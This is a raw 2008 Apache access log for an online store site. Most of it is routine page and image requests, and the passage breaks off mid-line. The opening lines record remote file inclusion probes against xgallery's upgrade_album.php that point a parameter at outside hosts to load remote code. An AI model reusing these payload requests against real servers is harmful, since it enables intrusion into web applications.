62.76.116.20 - - [28/Jul/2008:05:59:46 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:05:59:46 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:05:59:46 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.810"
207.210.115.114 - - [28/Jul/2008:06:01:06 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
207.210.115.114 - - [28/Jul/2008:06:01:06 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
209.59.12.99 - - [28/Jul/2008:06:04:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.78.146 - - [28/Jul/2008:06:06:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:43 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:44 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:06:06:46 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.